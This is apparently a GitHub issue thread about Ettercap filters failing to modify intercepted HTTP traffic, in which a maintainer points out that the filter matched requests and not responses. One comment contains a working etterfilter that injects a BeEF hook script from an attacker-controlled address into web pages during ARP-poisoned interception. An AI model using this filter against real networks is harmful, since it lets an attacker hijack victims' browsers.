### ISSUE TITLE
Ettercap filters can't find data

### ISSUE THREAD

**Issue by HammerSec** [Ettercap/ettercap#1042]
Hello,

In playing with Ettercap over the past few days I noticed the search() and replace() Etterfilter functions cannot find data known to be in intercepted HTTP requests.

Useful Information
- OS (via uname -a): Linux kali 5.6.0-kali1-amd64 # 1 SMP Debian 5.6.7-1kali1 (2020-05-12) x86_64 GNU/Linux
- Ettercap versions: 0.8.3 (installed via apt) and 0.8.4-rc (built from source)

**_Test Scenario: Replace the "Server" header with "Waiter" (no HTTPS)._**

Etterfilter used to test:
```
# Replaced DATA.data with DECODED.data, just to be thorough.
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Server:")) {
        replace("Server:", "Waiter:");
        msg("[+] Server header replaced!");
    }
    else {
        msg("[-] Server header not found in DATA.data");
    }
}
```

Testing notes:
- Requested host and target machine are both on the same subnet
- Also tried searching/replacing HTML data (I can provide the filter and test page source if needed)
- ARP cache was successfully poisoned on the target machine
- IE, Edge, Chrome, and curl (via PowerShell) ignored the changes (browsers tested on Win10)
- Forced browser refreshes (shift+F5) were used between tests

**Comment by koeppea** [comment]
Yes please provide the content of the filter.

**Comment by HammerSec** [comment]
HTML Injection Filter (using a BeEF hook):
```
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "<head>")) {
        replace("<head>", "<head><script src=\"http://10.0.0.1:3000/hook.js\"></script>");
        msg("[+] Injected beef hook!");
    }
    else {
        msg("[-] Head tag not found in DATA.data");
    }
}
```
Page used to test the filter:
```
<!DOCTYPE HTML>
<html>
<head></head>
<body>
This is a test. Is the hook being injected?
</body>
</html>
```
Test notes:
- The BeEF hook is accessible to the target machine and is not blocked by firewalls
- All browsers and refresh methods listed above yielded no modifications to the HTML data

**Comment by koeppea** [comment]
I think you have a basic thinking error in your filter.
The replace action only triggers when the destination port is 80 and it finds the head-tag in the same packet.
But packets with a destination port of 80 is normally the HTTP request.
I guess you want to modify the response from the server which packet's would have the port 80 set as the source port.

So you have to check packets which have `tcp.src == 80`.

**Comment by koeppea** [comment]
OK question would be if Ettercap filter can not find data.
I think it can but it might have issues with overfilling packets.
But this would mean that this issue can be closed isn't it?

**Comment by HammerSec** [comment]
Certainly. We can mark this issue up to a layer 8 issue :)
